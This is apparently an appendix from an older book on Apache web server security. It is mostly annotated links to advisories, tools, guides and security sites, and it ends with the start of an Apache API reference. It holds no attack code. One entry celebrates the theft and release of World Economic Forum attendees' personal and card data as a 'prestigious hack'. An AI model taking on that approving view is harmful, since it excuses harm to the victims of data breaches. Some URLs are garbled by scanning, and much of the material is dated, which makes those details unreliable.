the same license as used by Apache from version 0.8.15.
Site Title: Apache Toolbox
URL: http://www.apachetoolbox.com/
Description: Apache Toolbox provides a means to easily compile Apache with SSL,
PHP (v4 or v3), MySQL, APC (Alternative PHP Cache), mod_auth_nds, mod_dynvhost,
WebDAV, mod_fastcgi, mod_gzip, mod_layout, mod_throttle, and many, many more.

Site Title: Apache Guides
URL: http://cybernut.com/guides/apache.html
Description: Cybernut's comprehensive guide to installing and configuring
Apache. Useful if you're new to Apache, and the page links out to various
tutorials, including those on access control.

Site Title: Apache Week
URL: http://www.apacheweek.com/
Description: A must-visit site for any Apache administrator, Apache Week covers
everything, including configuring, security, book reviews, recent news,
performance tweaking, and so on.

Site Title: 10th USENIX Security Symposium—Works In Progress Session
URL: http://www.usenix.org/events/sec01/mcdaniel_wip.html
Description: At this event, Sean Smith from Dartmouth presented his paper "Web
Spoofing," a discussion of how to circumvent Apache and SSL security. He also
presented "WebALPS Trusted Third Parties." Find both papers and more technical
discussion on SSL/Apache security at http://www.cs.dartmouth.edu/~pkilab/papers/.

Site Title: 4.4BSD implementation
URL: http://www.v6.imasy.org/nrl.html
Description: Apache-friendly IPv6 and IP Security implementation for
4.4BSD-Lite from The US Naval Research Laboratory
(http://www.itd.nrl.navy.mil/ITD/general.html).

Site Title: Cara Isengi Apache: Dan Kiat Mengatasinya
URL: http://mwmag.sslguarded.com/issue/01/content/hack-7_apache/hack-7_apache.html
Description: An Indonesian Apache security resource site.
Site Title: Semanos 70: Security Team
URL: http://kerubin.galeon.com/ezines.htm
Description: Great Spanish language security site, packed with links on various
security issues (worms, viruses, Apache, PHP, mySQL).

Site Title: 99-1549: CIAC Bulletin J-042: Web Security
URL: http://www-leland.stanford.edu/group/itss-ccs/security/Advisories/99-1549.html
Description: Historical CIAC bulletin with solid advice on how to configure
your Web server in networks to minimize damage from DoS attacks and avoid other
more generic attacks. Sadly, CIAC rarely reveals who writes such advisories,
so I cannot credit those contributors.

Site Title: A.P. Lawrence, Consultant-Book Reviews-Internet Security
URL: http://www.pcunix.com/Books/is.html
Description: Site that has book reviews and links to many relevant articles,
like John Pritchard's "Setting Up Apache on UnixWare" and A. P. Lawrence's
squidGuard primer.

Site Title: Access Road home page
URL: http://accessroad.sourceforge.net/home.html
Description: Every once in a while, someone creates a killer application that
every Web or system administrator should have. Access Road is one such
application (but is available only for Linux, and perhaps other Unix platforms
with the requisite Java support). Access Road graphically illustrates
permissions on your Web server. If you want to see how deep its analysis goes,
check out one case study here:
http://accessroad.sourceforge.net/Documentation/ACdesign_2.html#anchor1117075/.
Kudos to the author, Patrick Thazard, for a job well done. Finally, someone has
started treating access control as a model, not a condition.

Site Title: ACLU in Court: ACLU v. Reno II Expert Report of Dan Farmer
URL: http://www.aclu.org/court/acluvrenoII_farmer_rep.html
Description: Dan Farmer (of SATAN fame) does it again. This is a historical
document. However, if you're new to Web security, it's a gem. In sum, the ACLU
went heads-up with Janet Reno and the Department of Justice on content
filtering and online pornography. Here, Dan responds in his capacity as an
expert witness, explaining Web security and his findings in "Shall We Dust
Moscow," a project in which he scanned thousands of purportedly secure Web
sites. Find SWDM here: http://www.trouble.org/survey/.
Site Title: Adminhelp.org
URL: http://www.adminhelp.org/
Description: Site that contains useful tools and utilities for Apache
administrators, including 215 prefabricated CGI scripts that do things such as
counting, checking permissions, log analysis, and so on.

Site Title: Administrators Windows NT links
URL: http://www.it.jyu.fi/%7Ejej/nt-links.html
Description: Excellent list compiled by Jukka Jarvinen of important security
resources for NT system, Web, and Apache administrators.

Site Title: Advisories: PHP and Apache Vulnerability
URL: http://www.secureroot.com/security/advisories/9761548341.html
Description: Advisory that shows how crackers can exploit W2K or WinNT 4.0 +
Apache 1.3.6 + PHP to gain read access to files. Credit goes to CHINANSL at
http://www.chinansl.com.

Site Title: Advisories: PHP Apache Module Bug
URL: http://www.secureroot.com/security/advisories/9795692378.html
Description: Advisory that shows how crackers can—in very limited
conditions—exploit Apache + PHP to bypass .htaccess security. Credit here is to
the PHP Group at http://www.php.net.

Site Title: Advisories: Possible Security Issues with Apache
URL: http://www.secureroot.com/security/advisories/9641781410.html
Description: Historical advisory about Apache 1.2.5 through the 1.3b4 beta. The
advisory stemmed from coding errors in cfg_getline(), mod_include, logresolve,
mod_proxy, and the proxy cache. (Additionally, there were issues with .htaccess
bypassing.) The document is relevant here because if you're a C programmer, you
can go back to 1.2.x, look at the problems, and understand why the issues
arose.

Site Title: Advisories: SuSE Apache CGI Source Code Viewing
URL: http://www.secureroot.com/security/advisories/9684965790.html
Description: Historical advisory that explains how attackers can gain access
to files that contain user IDs and passwords. SuSE 6.4 and earlier reportedly
harbored this problem. Credit here goes to the team at @stake at
http://www.atstake.com. The document is relevant here because if you're a C
programmer, you can go back, look at the problems, and understand why the
issues arose.

Site Title: Advisories: SuSE Apache WebDAV Directory Listings
URL: http://www.secureroot.com/security/advisories/9684966437.html
Description: Historical advisory that explains how attackers, by exploiting the
WebDAV extension (see RFC 2518), can gain access to secret or protected files.
Credit here goes to the team at @stake at http://www.atstake.com. The document
is relevant here because if you're a C programmer, you can go back, look at
the problems, and understand why the issues arose.


Site Title: Advisories: SUSE Security Announcement: pam_smb 
URL: http: //www.secureroot.com/security/advisories/9693904117.htm1l 


Description: Historical advisory that explains how attackers, by exploiting pam_smb, a 
Pluggable Authentication Modules module that allows Unix-style authentication from WinNT 
to Unix, can gain accelerated and unauthorized access. Credit here goes to SuSE at 


http://www. suse.com. 


Site Title: Advisories: Updated apache, php, mod_perl, and auth_ldap Packages Available 
URL: http: //www.secureroot.com/security/advisories/9735735897. html 


Description: Historical advisory that reports updates for mod_rewrite, which had security 
issues. Credit here goes to Red Hat Software at http: //www.redhat.com. The document is 
relevant here because if you’re a C programmer, you can go back, look at the problems, and 


understand why the issues arose. 


Site Title: AERAsec—Network Security—News March 2000 
URL: http://www. aerasec.de/security/0300_e.html 


Description: Historical advisory on Apache. The advisory isn’t important, but the site is. The 
root of the site is http: //www.aerasec.de/security/, but it’s in German. Advisories and 
summaries in English, however, are available. URLs are numbered, and ones in English follow 
the number by an underscore and an “e”, as in 

http://www. aerasec.de/security/0300_e.html. This site is comprehensive, covering secu- 


rity advisories from widely diverse sources. 
Site Title: alldas.de Security Help Archive
URL: http://security.alldas.de/

Description: Security archive with useful links, including mirrors of recently hacked sites. (Don’t ever let your site get on that list.) Most interesting is the archive that scores well-known attackers by how many Web sites they defaced (it also stores the sites themselves). Maybe our vendors and cyber defense people should visit this site. In the A category, which cites 150 attackers alone, Azrael666 reigns supreme with 199 defaced sites, and of these, most were in the US. Busy fellow.

Site Title: AmEx, Discover Forced to Replace Cards over Security Breach
URL: http://news.cnet.com/news/0-1007-200-1526496.html

Description: Historical article by CNET staff writer Troy Wolverton about how an attacker ripped more than 350,000 American Express and Discover credit card numbers. But, the Internet is unequivocally safe for credit card transactions, isn’t it? The article’s not relevant to Apache, but merely a lesson learned: The Net is not safe for credit card transactions, no matter what your vendor, bank, or credit card company contends.

Site Title: An Extensively Instrumented Apache/Linux
URL: http://www.isoc.org/inet99/posters/058/index.htm

Description: Discussion of NIST’s ALMT (Apache/Linux Measurement Toolkit), which does performance measuring. If you have high traffic and use Linux and Apache, this will interest you. Even if you have no interest in the specific solution proposed, the mere discussion is instructive on how Apache handles traffic. Credit here goes to Debra Tang and Jihg-Hong Lin of NIST.

Site Title: ANNOUNCE Apache::ASP v1.95—Security Hole Fixed
URL: http://members.cotse.com/mailing-lists/bugtraq/2000/Jul/0141.html

Description: Historical advisory about how Apache::ASP had a serious hole. If you’re a Perl programmer, this is relevant because you can go back, check the flawed module against the fix, and understand why the issue arose. Credit here goes to Joshua Chamas.

Site Title: ANNOUNCE: New Security Tool: HostSentry 0.02 Alpha
URL: http://www.cert.uni-stuttgart.de/archive/bugtraq/1999/03/msg00190.html

Description: An announcement from Psionic software on HostSentry, an excellent IDS tool for Unix-based systems. The announcement describes its basic characteristics, but you can get the tool at http://www.psionic.com/abacus/hostsentry.
Site Title: Apache 1.3.14/Tomcat 3.2.1/IRIX 6.5
URL: http://www.ccl.net/cca/software/UNIX/apache/irix-6.5/README.html

Description: Jan Labanowski here describes experiences with integrating SGI hardware, Java, Tomcat, Apache, and IRIX. This is essentially a quick primer on getting these technologies running on an SGI.

Site Title: Apache Configuration Editor
URL: http://www.darkphoton.com/darkstar/

Description: Here you’ll find Dark Star Technologies’ Apache Configuration Editor, a tool that enables you to manage Apache’s configuration on Windows (Win95, NT 4.0, 2000).

Site Title: Apache Debugging Guide
URL: http://apache.kks.net/debugging.html

Description: Tools and techniques for debugging Apache and Apache modules. A good starting place if you want to start writing modules but haven’t yet had experience in this area.

Site Title: Apache’s Java Apache Project
URL: http://java.apache.org/

Description: This site is your starting point for Apache in Java. Here you’ll find powerful servlets, applets, examples, source code, and documentation sufficient to guide you through Java/Apache development.

Site Title: Apache Quick Reference Card
URL: http://www.refcards.com/about/apache.html

Description: Great quick reference from Apache: The Definitive Guide.

Site Title: Measurement, Analysis and Performance Improvement of the Apache Web Server
URL: http://www.ele.uri.edu/Research/hpcl/Apache/

Description: A paper by Yiming Hu, Ashwini Nanda, and Qing Yang, presented in the 18th IEEE International Performance. Studies Apache’s performance. In PostScript.

Site Title: Design Considerations for the Apache Server API
URL: http://www5conf.inria.fr/fich_html/papers/P20/Overview.html

Description: This HTML paper by Robert Thau explains design decisions, what problems the API tries to solve, and how it is structured to solve those problems.
Site Title: Apache Server Survival Guide
URL: http://www.hQwt®.com/fileoftheday/Apache/index.htm

Description: Manuel Alberto Ricart’s Apache Server Survival Guide from SAMS.NET. Good, general advice.

Site Title: Apache Tomcat/Apache UNIX FAQ
URL: http://kekule.osc.edu/cca/software/UNIX/apache/tomcatfaq.shtml

Description: Tomcat is a tool to use Java Server Pages (JSP) with Apache in conjunction with JServ. This HTML document explains some of the finer points of doing that. Credit goes to Jan Labanowski of the Ohio Supercomputer Center.

Site Title: Apache.org Compromise Report, May 30th, 2001
URL: http://www.apache.org/info/20010519-hack.html

Description: Apache’s own site was hacked on May 17, 2001, and this is Apache’s official report on the incident in HTML. Credit goes to The Apache Software Foundation.

Site Title: Apache-DBD::Informix Howto
URL: http://www.iiug.org/resources/linux/Howto_DBD.html

Description: Apache plus Informix? You bet. This HTML document, authored by Marco Greco with contributions from Jonathan Leffler, gives the short and skinny on how to do it.

Site Title: Apache-SOAP User’s FAQ
URL: http://xml.apache.org/soap/faq/faq_chawke.html

Description: This HTML document by Jonathan Chawke (who maintains the FAQ and the Apache-SOAP User’s Mailing List) discusses Apache and the Simple Object Access Protocol.

Site Title: Appendix C2—Installation of the Hawkeye PHP Admin Tools
URL: http://hawkeye.net/doc/appendix_c2.htm

Description: Part of the Hawkeye Documentation Index, Version 1.20, this HTML document authored by Thomas Haberland and Roland Haenel explains how to install Hawkeye’s server suite with Apache + PHP. (Hawkeye is an Internet/intranet server suite, implementing Web, mail, news, file and chat servers.)

Site Title: AS/400 or i-Series
URL: http://www.huikb.com/as_400_or_i-series.html

Description: AS/400 servers with Apache 2.0. Commercial site.
Site Title: ATTRITION Tools
URL: http://www.attrition.org/tools/

Description: A few good security tools from the folks at attrition.org.

Site Title: Authentication Module for Apache
URL: http://www.frogdot.org/mod_auth_mda/index.html

Description: Home base of mod_auth_mda with discussion of how the module works. It stores graphical representations of the module’s procedures.

Site Title: AWKhttpd—HTTPD written in AWK
URL: http://awk.geht.net:81/README.html

Description: Are you an awk advocate? Here it is, then, for your surfing pleasure: an httpd implementation by Valentin Hilbig entirely in awk (called, of course, AWKhttpd). This isn’t relevant to Apache security, but is instead an interesting study in developing servers with alternate languages. It’s extensible with modules as well, but supports no virtual hosts. (How can it be?) Interesting note: It’s not anywhere near as slow as its author suggests. More interesting note, especially for late-night programmer amusement: The site links to httpd servers written in sed (incredible), shell language (come on!), and PostScript (yes, PostScript). Now, that’s a hack if I ever saw one.

Site Title: Basic Apache Security Considerations
URL: http://www.sans.org/infosecFAQ/Web/apache_sec.htm

Description: Article from SANS and John E. Grotevant on basic Apache security. An in-a-nutshell look at Apache security.

Site Title: Basic Merit AAA Server
URL: http://www.merit.edu/aaa/

Description: The Merit Authentication Server is a full-fledged RADIUS implementation for Linux/Unix systems. (Planning on starting a small ISP?) Mind the licensing here: it’s freely available, but not for redistribution.

Site Title: BigNoseBird’s APACHE Server Reference and Tutorials
URL: http://www.bignosebird.com/apache.shtml

Description: A few quick but good tutorials here. Example: “Preventing bandwidth theft using mod_rewrite and .htaccess.” Credit: BigNoseBird.
Site Title: Black Oasis—Updated Security Tools
URL: http://home.earthlink.net/~humbz/ust05.htm

Description: A few interesting security tools here, such as NTsyslog 1.5, which runs as a service under Windows NT, formats all system, security, and application events to a single line, and sends them to a syslog(3) host. Credit goes to Black Oasis.

Site Title: Build a Secure System with LIDS
URL: http://www.linuxfw.org/feature_stories/feature_story-12.html

Description: Discussion of building secure servers around Linux Intrusion Detection System (LIDS). This system provides you not merely with intrusion detection, but incisive access control as well, even to the point of disallowing root access to certain system resources. Credit goes to Xie Huagang.

Site Title: Building a Secure RedHat Apache Server HOWTO
URL: http://www.linuxdoc.org/HOWTO/SSL-RedHat-HOWTO.html

Description: Richard Sigle’s HOWTO that explains how PKI and SSL work together.

Site Title: Building Intrusion Tolerant Applications
URL: http://crypto.stanford.edu/~dabo/abstracts/ittc.html

Description: Paper that discusses means of handling intrusions through a new concept. “The ITTC project provides tools and an infrastructure for building intrusion tolerant applications. Rather than prevent intrusions or detect them after the fact, the ITTC system ensures that the compromise of a few system components does not compromise total system security.” Credit goes to T. Wu, M. Malkin, and D. Boneh.

Site Title: Class JarSigner
URL: http://www.bitwaste.com/projects/JARSigner/doc/com/bitwaste/jarsigner/JarSigner.html

Description: Java class for signing JAR files.

Site Title: Common Gateway Interface & Web Security
URL: http://www.dia.unisa.it/~ads/corso-security/www/CORSO-9900/cgiSecurity/cgiSecurity.html

Description: Thorough tutorial in Italian on CGI security by M. Cillo, G. Di Santo, and L. Venuti.
Site Title: DAML Tools
URL: http://www.daml.org/tools/

Description: The DARPA Agent Markup Language Homepage, with DAML security tools and explanations. The Semantic Web is coming, and if you intend to implement it, this is an interesting read. Credit: DARPA Technology Integration Center (TIC) in Arlington, VA.

Site Title: Das SSL-Apache Handbuch
URL: http://www.informatik.hu-berlin.de/~bell/Doku/Apache-ssl

Description: Handbook on using SSL + Apache in German. Credit goes to DFN-PCA in Hamburg.

Site Title: DECS—Security
URL: http://www.egr.msu.edu/decs/support/security/

Description: Division of Engineering Computing Services security page at the Michigan State University College of Engineering. Good general security site, with updates on the latest advisories.

Site Title: Detecting Intruders—MPRM Group Limited Network Security
URL: http://www.mobrien.com/intruders.shtml

Description: Well-researched article on manually detecting intrusions. Nothing incredibly in-depth, but great to have all this information assembled in one place. Credit: MPRM Group.

Site Title: Dot-Com Builder: Security
URL: http://dcb.sun.com/practices/websecurity/

Description: Good all-purpose security site at Sun that includes current articles on issues that will interest any Apache administrator. Examples: Brian Stephens’ “Architecting Secure Network Topologies,” which studies deficiencies in VLANs, and Lori Houston’s “SOAP Security Issues,” an excellent overview of Simple Object Access Protocol’s security implications (and such wildcard technologies as ebXML Messaging Service). Credit goes to Sun Microsystems.

Site Title: DSL and Cable Modem Security
URL: http://www.pcunix.com/Security/dslsecure.html

Description: Hosting Apache from home? This article from A. P. Lawrence is instructive and features links to many important documents.
Site Title: Dutch Security Information Network
URL: http://www.dsinet.org/

Description: The Dutch Security Information Network’s home. Great all-purpose notification network in English and Dutch with up-to-date advisories and articles. Examples: “Hacking the TCSX-1 for Fun and Profit,” “IPsec Tunneling Between FreeBSD Hosts,” “New Vulnerability in OpenSSH,” and so on. Credit: Dutch Security Information Network.

Site Title: E-mail—Security and Headers, Tracing, Spamming, Etc.
URL: http://members.tripod.co.uk/netmiser/spamhelp.htm

Description: An all-purpose starting point for e-mail security issues, including forgeries, tracing spam, and so on. Credit: Debra Wilson.

Site Title: FAQ: Network Intrusion Detection Systems
URL: http://www.robertgraham.com/pubs/network-intrusion-detection.html

Description: The IDS FAQ. If you’d like to implement an intrusion detection system but have no experience in this area, this document is a great help. Credit: Robert Graham.

Site Title: FrontPage Server Extensions: Security Considerations
URL: http://www.rtr.com/fpsupport/SERK/security.htm

Description: Excellent document that illustrates the issues behind FrontPage extensions. Credit: Microsoft.

Site Title: GNUJSP
URL: http://www.klomp.org/gnujsp/

Description: GNUJSP is a free implementation of Sun’s Java Server Pages. Credit goes to Vincent Partington. If you’re using Mac OS X, a good related article is “Installing GNUJSP on MacOS X Server,” written by Chris Stetson and located at http://metadogs.com/tech/mosxs_jsphelp.jsp.

Site Title: GuardCentral.com
URL: http://www.guardcentral.com/

Description: Intelligent security news site that includes articles from various publications around the Internet.
Site Title: Guide for Building a PPPoE Gateway and Firewall Using OpenBSD
URL: http://real.ath.cx/BSDinstall.html

Description: In-depth article by Real Ouellet that provides an excellent solution to PPPoE (PPP over Ethernet) overhead. If you’re using XDSL to host an Apache system and your provider uses PPPoE, this is for you. You can deal with the PPPoE issue and establish an excellent firewall in the bargain.

Site Title: Hacking & Cracking Pages
URL: http://www.crackinguniversity2000.it/hacking.html

Description: An Italian hacking site with many tools, tutorials, and books. This site is reminiscent of the hacking days of old, and contains copious resources on everything from forensic analysis to hacking MAPI, SAPI, and TAPI. Sample paper: Ron Gula’s “Broadening the Scope of Penetration Testing Techniques: The Top 14 Things Your Ethical Hackers for Hire Didn’t Test.” Sample tool: packet2sql, which converts any text file/log file that contains ipchains packet logs into a stream of SQL inserts that can be used as the base for a firewall-analyzing database application.

Site Title: Hacking Lexicon
URL: http://www.robertgraham.com/pubs/hacking-dict.html

Description: Robert Graham’s Hacking Lexicon.

Site Title: HTTPD::Realm—Database of HTTPD Security Realms
URL: http://moose.qx.net/perldocs/HTTPD/Realm.html

Description: HTTPD::Realm defines high-level security realms to be used in conjunction with Apache, Netscape, and NCSA Web servers. This allows automated tools to change user passwords, groups and other information without regard to the underlying database implementation. Credit: Lincoln Stein (of WWW Security FAQ fame).

Site Title: HTTPD::RealmManager—Manage HTTPD Server Security Realms
URL: http://moose.qx.net/perldocs/HTTPD/RealmManager.html

Description: HTTPD::RealmManager provides a high-level, unified view into the many access control databases used by Apache, Netscape, NCSA httpd, CERN, and other Web servers. It works hand-in-hand with HTTPD::Realm, which provides access to a standard configuration file for describing security database setups. Credit: Lincoln Stein (of WWW Security FAQ fame).
Site Title: Information Security Magazine
URL: http://www.infosecuritymag.com

Description: TruSecure’s glossy, well organized, informative Information Security Magazine. It has a strong commercial bent, but carries excellent articles by security professionals well-recognized in the field.

Site Title: Integrate Security Infrastructures with JBossSX
URL: http://www.javaworld.com/javaworld/jw-08-2001/jw-0831-jaas.html

Description: Declarative security overview of Java 2 Enterprise Edition, the Java Authentication and Authorization Service (JAAS), and how you can manage security of the same with JBossSX. If you dabble in XML, are using J2EE, and intend to secure Java-driven applications, this is an engrossing read. Credit: Scott Stark.

Site Title: Integrating LDAP with Perl and Apache
URL: http://www.posey.org/1998_perl_conference/Perl_and_Apache/LDAP/index.html

Description: Clayton Donley’s paper on Apache/LDAP integration and how it bears on security, user authentication, and access control. (Also, good discussion on Net::LDAPapi.)

Site Title: Internal Security: Rules and Risks
URL: http://www.webtechniques.com/archives/2001/07/sholtz

Description: Article whose author (PrivacyRight’s Paul Sholtz) reports that the Black Bloc ripped the “New World Order” master list from the World Economic Forum. “On February 4, 2001, anti-globalization activists mailed a CD-ROM to a Swiss newspaper that listed the names of 27,000 attendees of the 2001 World Economic Forum in Davos, Switzerland.” Activists listed personal details (credit card numbers, addresses, travel itineraries) of 1,400 targets, including Bill Gates, Tim Koogle, Madeleine Albright, and Shimon Peres. Data on an additional 1,800 targets listed Web passwords, payment methods, and session information. I’d be hard-pressed to cite a more prestigious hack, or one that struck more deeply at the heart of today’s “Imperialist” interests. Certainly, the WEF should maintain higher levels of security than this. By not doing so, it inadvertently exposed Earth’s emerging aristocracy for the world’s amusement. This event illustrated an important lesson: The Web levels the playing field and exposes everyone—no matter how privileged or insulated they are—to intelligence gathering and risk. Most of the 3,200 victims, meanwhile, probably have no idea that their data is out there floating around.
Site Title: Internet Firewalls Frequently Asked Questions
URL: http://www.hideaway.net/texts/fwfaq.html

Description: Marcus Ranum’s dated but fundamentally solid and informative firewalls FAQ. If you’re new to network security and/or firewalls, this is a must-read standard. Mr. Ranum, formerly of TIS, V-One, and NFR, is an Internet security aficionado from days of old. He reportedly co-designed the firewall first deployed at www.whitehouse.gov.

Site Title: Internet Security Resources and Links
URL: http://www.rtek2000.com/Tech/InternetSecureLinks.html

Description: Site with many links to technologies of vital interest to Webmasters and Apache administrators, including tools and/or documents that facilitate or explain authentication, network access control, Web site performance and load balancing, log file analysis, and so on.

Site Title: IT Security Cookbook
URL: http://www.boran.com/security/index.html

Description: Sean Boran’s online book—updated annually—that describes bottom-line security measures for a multitude of contingencies, especially in heterogeneous networks.

Site Title: Mac OS X 10.0 Security Essentials
URL: http://www.sans.org/infosecFAQ/mac/OSX_sec.htm

Description: Informative article by Roland E. Miller III that examines Mac OS X security. In it, Miller discusses Apache, developer tools within the BSD-based system that could aid local attackers, and file system and partition security. This is an important document for users new to OS X, Apache, and Unix-based systems generally. Miller also covers OpenSSH, ipfw, and tcp wrappers, all of which, although old hat to Unix and Linux administrators, remain relatively new developments to Mac.

Site Title: Macintosh Security Site
URL: http://www.securemac.com/

Description: This site, run by Freaky, is bar none the Internet’s best Mac security site. Because OS X ships with Apache—and many other tools new to Mac users—this site is essential. If you intend to administrate an Apache server on Mac OS X or OS X Server, bookmark SecureMac and visit it often. Many in the Mac community have expressed anxiety over adopting the new system, mainly because of their unfamiliarity with OS X’s underlying technologies. Well, I suspect that however indirectly, Freaky’s site will reassure Mac users and encourage them to migrate over. It’s really an excellent site.
Site Title: MacInTouch Reader Reports: OS Web Security Issues
URL: http://www.macintouch.com/Websecurity.html

Description: This page is engrossing, but not what you’d traditionally expect as a security resource. Steve Dawson wrote a letter, “MacOS Versus Mac OS X Security as a Webserver,” in which he argued that earlier MacOS versions surpassed Mac OS X in security. He then awaited responses—and received them. In follow-up letters, Mac users deploying both versions give long and informative responses on the debate and relate their personal experiences. If you just recently migrated to Mac OS X and intend to deploy Apache on it, this heated exchange is worth reading.

Site Title: mod_perl Coding Guidelines
URL: http://perl.apache.org/guide/porting.html

Description: Stas Bekman’s excellent primer on coding modules for Apache. Great stuff for the budding module hacker.

Site Title: Novell Developer Kit—Apache Modules for NetWare Details
URL: http://yes.novell.com/ndk/modapach.htm

Description: If you’re contemplating running Apache on Novell NetWare, this site has several useful modules and articles that can get you up and running. Sample article: “How to Use NDS eDirectory to Secure Apache Web Server for NetWare.” Credit: Novell.

Site Title: Protecting the Apache HTTP Server: General Security & Protection From HTTP DoS
URL: http://www.sans.org/infosecFAQ/sysadmin/apache.htm

Description: Kevin J. Martin examines various attacks that Apache has historically fallen victim to, and how to prevent them or minimize their effects.

Site Title: SecMod—Security Module for Unix Operating Systems
URL: http://www.secmod.com/

Description: SecMod is an extension module for Unix operating systems that gives an administrator total control over what applications and users can do on the system. It offers enhanced file, directory, network, and process quota security. A commercial product worth investigating. Credit: Oy Online Solutions.

Site Title: Setting Up Apache Tomcat and SOAP for SSL Communication
URL: http://xml.apache.org/soap/docs/install/FAQ_Tomcat_SOAP_SSL.html


Description: Article by Peter Glynn and Darrell Drake that addresses a fairly complicated application set in a security context. The document is no-nonsense and provides a clear path to getting these technologies up and working together, including Java Secure Socket Extensions (JSSE) installation, key generation, and preparing both Tomcat and SOAP to interface with SSL.

Site Title: SSL Performance: Stronghold/Apache+SSL on Linux, FreeBSD, and BSDI platforms
URL: http://askon.cz/csw-labs/Stronghold%20report/shperformance.html

Description: A fairly deep analysis of the performance of Stronghold and Apache + SSL (secure httpd implementations). As you’ll invariably find if your server takes heavy traffic, SSL does have overhead; enough overhead, actually, that many vendors make PCI cards that exclusively handle SSL, thus relieving the server of that responsibility. At any rate, this document, by Shawn Abbott and Stephen Keung, looks at performance on several platforms and hardware configurations.

Site Title: Using Apache as a Secure Web Server
URL: http://linux-rep.fnal.gov/RHL-7.1-Reference-HTML/ch-installation.html

Description: From Red Hat Software (Red Hat Linux 7.1: The Official Red Hat Linux Reference Guide), this document discusses mod_ssl, OpenSSL, Apache, and TLS (Transport Layer Security).

Site Title: Using Apache JServ
URL: http://www.magiccookie.com/computers/apache-jserv/old-howto.html

Description: This page describes how to download, build, install, and configure the beta version of Apache JServ. Apache JServ is a module for the Apache Web server that implements Sun’s Java Servlet API for running server-side Java code.

Site Title: Version Augmented URIs for Reference Permanence via an Apache Module Design
URL: http://class.ee.iastate.edu/berleant/home/me/cv/papers/195.html

Description: Interesting article that doesn’t focus on security, but rather a method of using an Apache module to improve the reliability of document delivery on Web servers.

Site Title: VPN and Security Products
URL: http://www-kr.cisco.com/warp/public/752/qrg/cpqrg5.htm

Description: Document that compares various VPN products and highlights Cisco IDS—Network Sensor, which works in conjunction with Apache.
Site Title: WAP Gateway and Server Tools
URL: http://www.palowireless.com/wap/servertools.asp

Description: If you intend to incorporate wireless (WAP) functionality into your Web server system, this site has a variety of interesting tools, both in its general section and its security-specific section. Example: W/Secure SDK, a software development kit allowing application developers to create secure encrypted sessions between online networked applications. Uses Wireless Transport Layer Security (WTLS).

Site Title: WDVL: VL-WWW: Tools
URL: http://www.wdvl.com/Vlib/Software/Tools.html

Description: WDVL is a free encyclopedia of Java, HTML, JavaScript, CGI, DHTML, XML, Perl, Web design and domain name tutorials and resources.

Site Title: Web Authentication/Security
URL: http://ist.uwaterloo.ca/security/Web-auth/index.html

Description: Brief survey of the authentication methods available with the Apache Web server. An emphasis on the practical application of those methods, the addition of custom methods, and some observations on the security model and the resulting risks. Credit here goes to Reg Quinton.

Site Title: Web References for The CERT Guide to System and Network Security Practices
URL: http://www.cert.org/security-improvement/practicesbk.html

Description: A resource list compiled by the Computer Emergency Response Team at Carnegie Mellon. It’s actually a bibliography with embedded links from a greater work, the controlling article, which also offers excellent advice on securing Web servers.

Site Title: Web Security Solutions: Central Authentication for Locally Developed Applications
URL: http://www.cause.org/ir/library/html/cem993c.html

Description: An article by Noam Arzt and Daryl Chertcoff that focuses on one approach to Web security deployed at Penn University.

Site Title: WebmasterBase
URL: http://www.webmasterbase.com/

Description: General Webmaster site that covers many issues (security, intellectual property, coding, administration, database integration, and so forth). Credit here goes to SitePoint.
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Site Title: Incidents.org—The SANS Institute 
URL: http: //www.incidents.org 


Description: An excellent security resource from SANS, Incidents.org tracks attacker activity 
daily (and opens with a color-coded world map of where incidents occurred). Up-to-the- 


minute articles on attacks and solutions. 


Site Title: Wireless Networking Reference—Security 
URL: http: //www.practicallynetworked.com/tools/wireless_articles_security.htm 


Description: Are you planning to use Apache in conjunction with WAP or other wireless technologies? If so, give this page a look—it contains articles on wireless security. A typical example would be “Wireless Firewall Gateway White Paper,” which describes how the network security group in the NASA Advanced Supercomputing (NAS) Division developed a secure 802.11b wireless networking system. They used an off-the-shelf PC running the OpenBSD operating system, an Apache Web server, the Internet Software Consortium DHCP server, and IPF firewall software. 


Site Title: www.SNMPLink.org—Tools Products 
URL: http://www.snmplink.org/Tools.html 


Description: A great site with exhaustive and constantly up-to-date SNMP resources (like the SecureIntelligence suite from SNMP Research International, Inc.). If you incorporate SNMP into your overall administrative regimen, this site’s a must-visit. Credit here goes to Pierrick Simier. 


Site Title: Xatrix Security 
URL: http://www.xatrix.org/top.php 


Description: Xatrix is a computer security news portal that covers a wide range of Web security topics. The administrators have written scripts that rate their articles by how many times visitors have read them, thus giving you (perhaps) a benchmark of which articles are most important. An example article is “Microsoft May Disable Upgraded PCs,” which explains that “Users who upgrade their PCs may find they will not work when switched back on, under the software giant’s plan to use an artificial intelligence engine to deactivate illegal copies of Windows XP.” 
Site Title: XML Cover Pages 
URL: http://xml.coverpages.org/xmlArticles.html 


Description: Extensive collection of up-to-date XML resources (papers, articles, tools, commentary, reviews). The site also harbors copious links to XML schema. If you plan to use Apache for commerce-based applications, go here. Credit here goes to Robin Cover. 


Site Title: XML Tools by Category 
URL: http://moheadstart.org/~vnp9b1/xmltools.htm 


Description: This site harbors copious links to XML server tools. If you plan to use Apache for commerce-based applications, you should visit this site. A good example is IBM’s XML Security Suite. Credit here goes to Vijay Parmar at The University of Missouri, Columbia. 


Site Title: Zope—A Swiss Army Knife for the Web? 
URL: http://www.bristol.edu/ISC/zope/vine/vinezope.html 


Description: Zope is an open source Web application platform for both NT and Unix, which will interoperate with Web servers such as Apache and IIS. It supports ftp, http put, and WebDAV publishing methods. It has a highly developed security model, which allows the management of content to be extensively devolved. Zope integrates well with relational databases and other services (including LDAP and IMAP). 
Apache API Quick Reference 


This appendix briefly examines the Apache API and addresses the following topics: 


• Anatomy of an Apache transaction 
• Configuration 
• Handlers 
• Resource allocation 


Anatomy of an Apache Transaction 


When you properly install, configure, and run Apache Web 
Server, its transactions conform to the model illustrated in 
Figure D.1. 


Figure D.1, of course, describes only a simple request and 
does not consider more complicated transactions that 
could unfold with SSL, route themselves through multiple 
third-party modules, and so forth. 


Such basic transactions take a request through eight 
phases: 


• URI handling 
• User ID check 
• User auth check 
• User access check 
• MIME-type ID 
• External hooks 
• Response 
• Logging 


[Figure D.1 shows the eight phases as a top-to-bottom flow, with the modules that take part in each phase listed beside it:] 

URI Handling: mod_alias, mod_rewrite, mod_userdir, mod_speling, mod_vhost_alias 
User ID Check, User Auth Check, User Access Check: mod_access, mod_auth, mod_auth_dbm, mod_auth_db, mod_auth_anon, mod_auth_digest, mod_auth_ldap 
MIME-type ID: mod_mime, mod_mime_magic, mod_negotiation, mod_charset_lite (a user’s request must first survive all hurdles above this line before Apache serves the requested data) 
